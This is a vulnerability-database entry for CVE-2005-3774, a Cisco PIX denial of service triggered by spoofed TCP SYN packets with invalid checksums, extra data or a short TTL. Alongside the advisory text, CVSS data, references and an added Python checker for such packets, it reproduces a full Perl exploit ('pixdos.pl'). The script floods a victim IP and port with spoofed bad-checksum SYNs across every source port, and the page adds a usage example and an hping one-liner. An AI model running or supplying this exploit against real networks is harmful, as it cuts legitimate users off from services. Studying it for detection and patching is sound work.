CVE-2005-3774
CVSS5.0
Published: 2005-11-22 19:03:00
Revised: 2011-03-07 21:27:09

[Original] Cisco PIX 6.3 and 7.0 allows remote attackers to cause a denial of service (blocked new connections) via spoofed TCP packets that cause the PIX to create embryonic connections that would not produce a valid connection with the end system, including (1) SYN packets with invalid checksums, which do not result in a RST; or, from an external interface, (2) one byte of "meaningless data," or (3) a TTL that is one less than needed to reach the internal destination.


[CNNVD] Cisco PIX 6.3 Spoofed TCP SYN Packet Denial of Service Vulnerability (CNNVD-200511-314)

Cisco PIX is a hardware firewall solution.
Cisco PIX has a vulnerability in its handling of malformed TCP connection packets; a remote attacker could exploit it to deny service to legitimate sources. If a TCP SYN packet with an incorrect checksum is sent through the PIX firewall, the PIX blocks new TCP connections that use the same source and destination TCP ports and IP addresses until about 2 minutes later, when new connections are allowed again. An attacker can therefore send crafted TCP packets with incorrect checksums whose source/destination IPs and ports are set to those of legitimate hosts. Once the PIX firewall has accepted such a packet, no new TCP session can be established with the addresses and ports named in the malicious packet; by default this lasts 2 minutes 2 seconds, after which normal operation resumes.
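A defender-side check for the two spoofing variants described above (a SYN with an invalid TCP checksum, and a SYN carrying a byte of meaningless data), written here as an added example that is not part of the CVE record or of the exploit below: it verifies the TCP checksum over the IPv4 pseudo-header and counts, per 4-tuple, SYNs that would create an embryonic entry the end host can never clear with a RST. The packets are constructed inline; the TTL(n-1) variant is not covered because recognising it needs the path hop count. Function names are hypothetical.

```python
import socket
import struct
from collections import Counter

def _internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; odd-length input is padded with a zero byte."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def tcp_checksum(src: bytes, dst: bytes, seg: bytes) -> int:
    """TCP checksum over the IPv4 pseudo-header plus the segment with its checksum field zeroed."""
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(seg))
    return _internet_checksum(pseudo + seg[:16] + b"\x00\x00" + seg[18:])

def build_syn(src_ip, dst_ip, sport, dport, payload=b"", bad_checksum=False) -> bytes:
    """Constructed IPv4+TCP SYN for the demo (no options; IP checksum left 0, inspect() ignores it)."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0) + payload
    csum = tcp_checksum(src, dst, tcp)
    if bad_checksum:
        csum ^= 0x0010  # deliberately wrong, like the fixed 'check' value in the exploit on this page
    tcp = tcp[:16] + struct.pack("!H", csum) + tcp[18:]
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src, dst) + tcp

def inspect(packet: bytes) -> dict:
    """Parse IPv4/TCP: 4-tuple, bare-SYN flag, TCP checksum validity and SYN payload length."""
    ihl, total_len = (packet[0] & 0x0F) * 4, struct.unpack("!H", packet[2:4])[0]
    src, dst, seg = packet[12:16], packet[16:20], packet[ihl:total_len]
    sport, dport = struct.unpack("!HH", seg[:4])
    flags, doff, stored = seg[13], (seg[12] >> 4) * 4, struct.unpack("!H", seg[16:18])[0]
    return {
        "tuple": (socket.inet_ntoa(src), sport, socket.inet_ntoa(dst), dport),
        "syn": bool(flags & 0x02) and not flags & 0x10,
        "checksum_ok": stored == tcp_checksum(src, dst, seg),
        "syn_payload": len(seg) - doff,
    }

def suspicious_syns(packets) -> Counter:
    """Per 4-tuple, count SYNs that leave an embryonic entry that can never complete: bad checksum or SYN data."""
    hits = Counter()
    for pkt in packets:
        info = inspect(pkt)
        if info["syn"] and (not info["checksum_ok"] or info["syn_payload"] > 0):
            hits[info["tuple"]] += 1
    return hits
```

A 4-tuple that accumulates hits here is one the PIX would refuse new connections for during its embryonic timeout, so the counter is the value to alert on.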

- CVSS (base score)

CVSS score: 5 [Medium (MEDIUM)]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker does not need intranet or local access]
Authentication: NONE [no authentication needed to exploit]

- CPE (affected platforms and products)

cpe:/h:cisco:pix:7.0
cpe:/h:cisco:pix:6.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3774
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3774
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-314
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/853540
(UNKNOWN)  CERT-VN  VU#853540
http://xforce.iss.net/xforce/xfdb/25079
(UNKNOWN)  XF  cisco-pix-ttl-dos(25079)
http://xforce.iss.net/xforce/xfdb/25077
(UNKNOWN)  XF  cisco-pix-tcp-data-field-dos(25077)
http://www.vupen.com/english/advisories/2005/2546
(UNKNOWN)  VUPEN  ADV-2005-2546
http://www.securityfocus.com/bid/15525
(UNKNOWN)  BID  15525
http://www.securityfocus.com/archive/1/archive/1/427041/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 RE: Cisco PIX embryonic state machine 1b data DoS
http://www.securityfocus.com/archive/1/archive/1/426991/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 Cisco PIX embryonic state machine TTL(n-1) DoS
http://www.securityfocus.com/archive/1/archive/1/426989/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 Cisco PIX embryonic state machine 1b data DoS
http://www.securityfocus.com/archive/1/archive/1/417458/30/0/threaded
(UNKNOWN)  BUGTRAQ  20051122 Cisco PIX TCP Connection Prevention
http://www.osvdb.org/24140
(UNKNOWN)  OSVDB  24140
http://www.cisco.com/warp/public/707/cisco-response-20051122-pix.shtml
(UNKNOWN)  CISCO  20051128 Response to Cisco PIX TCP Connection Prevention
http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_security_notice09186a0080624a37.html
(UNKNOWN)  CONFIRM  http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_security_notice09186a0080624a37.html
http://securitytracker.com/id?1015256
(UNKNOWN)  SECTRACK  1015256
http://secunia.com/advisories/17670
(UNKNOWN)  SECUNIA  17670
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038983.html
(UNKNOWN)  FULLDISC  20051122 Cisco PIX TCP Connection Prevention
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038971.html
(VENDOR_ADVISORY)  FULLDISC  20051122 Cisco PIX TCP Connection Prevention

- Vulnerability information

Cisco PIX 6.3 Spoofed TCP SYN Packet Denial of Service Vulnerability
Medium  Design error
2005-11-22 00:00:00 2007-09-05 00:00:00
Remote

- Advisories and patches

The vendor has not yet provided a patch or upgrade; users of this product are advised to watch the vendor's home page for the latest version:
http://www.cisco.com/warp/public/707/advisory.html

- Vulnerability information (1338)

Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit (EDBID:1338)
hardware dos
2005-11-23 Verified
0 Janis Vizulis
N/A
# The easy way by logic logidev@gmail.com (line 2) untested /str0ke
# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx

#!/usr/bin/perl
# Each module is loaded at run time so that a missing dependency gives a readable error.
eval ("use Getopt::Long;"); die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;"); die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;"); die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, V $VERSION \n";
GetOptions (
    "help"        => \$usage,
    "device=s"    => \$device,
    "source=s"    => \$sourceip,
    "dest=s"      => \$destip,
    "sourcemac=s" => \$sourcemac,
    "destmac=s"   => \$destmac,
    "port=n"      => \$tcpport,
);

######################## Config option ####################

my $timeout = 0.1; # Delay between packets, in seconds (the original string "0,1" was not a number)

if ($usage) {&usage;}

if (!$device) {
    $device = 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn = 1;           # TCP SYN SET
my $tcpdata = "TEST";  # TCP payload
my $count = 0;

######################################################

# Initialize progress bar: one step per source port tried
my $progress = Term::ProgressBar->new(65536);
$progress->minor(0);
$packet = new Net::RawIP;
$packet->ethnew($device);

if (!$sourcemac) {
    $packet->ethset( dest => $destmac);
} else {
    $packet->ethset( source => $sourcemac, dest => $destmac);
}

# One SYN per 16-bit source port; $count is incremented only by the loop header
for ($count = 0; $count < 65536; $count++) {

    $packet->set({

        ip => {
            saddr => $sourceip,
            daddr => $destip
        },

        tcp => {
            check  => 0x0010, # Fixed, invalid TCP checksum (0 would make Net::RawIP compute a correct one)
            source => $count,
            dest   => $tcpport,
            syn    => $syn,
            data   => $tcpdata
        }});
    $packet->ethsend($timeout);
    #$packet->send($timeout);

    $progress->update($count); # the original passed $_, which is never set here
}

sub usage {
    print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs
and comments to info@arhont.com

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
[--destmac=MAC] [--port=n]

Options:

--help This message
--device Network interface (default eth0)
--source Victim source IP
--dest Victim destination IP
--sourcemac Victim source MAC
--destmac MAC Address of the gateway
--port TCP port

Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 \
--sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22
EOF

    exit shift;
}

# milw0rm.com [2005-11-23]

- Vulnerability information

21053
Cisco PIX Crafted TCP SYN Packet Saturation DoS
Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Cisco PIX contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker floods the device with spoofed TCP SYN packets containing invalid checksums causing the device to temporarily block new connections for the addresses and ports being spoofed.

- Timeline

2005-11-22 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete